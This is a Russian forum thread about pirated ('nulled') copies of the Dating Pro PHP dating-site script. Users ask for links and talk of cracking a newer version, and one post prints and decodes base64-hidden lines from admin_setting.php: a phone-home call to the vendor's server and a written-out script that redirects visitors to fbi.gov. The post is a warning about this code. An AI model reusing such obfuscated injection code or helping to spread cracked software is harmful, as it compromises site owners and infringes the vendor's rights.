Dating pro 2008 nulled

Статус
В этой теме нельзя размещать новые ответы.
:) вот это очень хорошо

Добавлено через 38 минут
чё то тема как то остановилась...не хорошо
 
привет привет

Добавлено через 32 минуты
в admin_setting.php на 1412 строке функция, в ней
участок кода
PHP:
$out_data = base64_decode("aHR0cDovL3BpbG90Z3JvdXAubmV0L2xpZ2h0aG91c2UvdGVzdC5waHA/YWN0aXZpdHlfaWQ9").$_REQUEST['activity_id'];

Равносильно
PHP:
$out_data ='http://pilotgroup.net/lighthouse/test.php?activity_id='.$_REQUEST['activity_id'];

потом на 1429 строке
PHP:
fputs($fp, base64_decode("PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmZiaS5nb3YvJzwvc2NyaXB0Pg=="));

равносильно
PHP:
fputs($fp,<script>document.location.href='http://www.fbi.gov/'</script>)

Для просмотра ссылки Войди или Зарегистрируйся заманчивый ресурсик
 
ссылки на шаблоны??

пожалуйста скиньте ссылки на шаблоны, те что выше не работают, спасибо:bc:
 


без баз, 35323 KB
взято от сюда


и кста та версия (2009г.) которая гуляет по инету якобы занулена, на самом деле с этими строчками то что выше, не рекомендую ставить кто не знает что делать
смотрел с Трех источников

возможно это спец. для ламаков за бугром которые могут проплатить якобы нанесеный ущерб , замануха от пилота
 
а тут ни кто не желает 2009 версию занулить по человечески? Или уже потеряли к этому интерес?
 
а тут ни кто не желает 2009 версию занулить по человечески? Или уже потеряли к этому интерес?

начал, от себя, т.е. на своем уровне знаний движка и пхп и прежнего опыта, скрипт от 2009 г. не совсем полный , буду сравнивать каждый файл, на это уйдет много времени
со временем туговато, поэтому мой результат, думаю будет где то через месяц
 
понимаю всем уже хочеться последнюю версию, но всё-же, перерыв весь интернет я так и не смог найти даже версию 2008 года...
 
а мы даже 2009 нашли, на поиск 2009 версии у меня ушло 2 минуты, все они корявые, криво зануленые
 
Читал читал тут себе решил все таки написать, все ошибки про которые вы тут пишите в 90% из за серверов, хотингов ! сам лично ставил на трех машинах win, и linux везде вылазила своя какая то кракозябра + где сам тупанешь , в итоге решился поставить на хостинг славо богу у нас не плохой =) и пока не одной проблемы не вылезло из тех что были на локальном компе так что прежде чем засорять форум не нужным хламом проверьте все ли вы правильно сделали , поставьте не денвер а xampp и запустите на обоих по очереди и даю 100% что будет вести себя везде по разному! у меня лично на denwer вообще не запустился установка скрипта только под xampp ! УДАЧИ
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху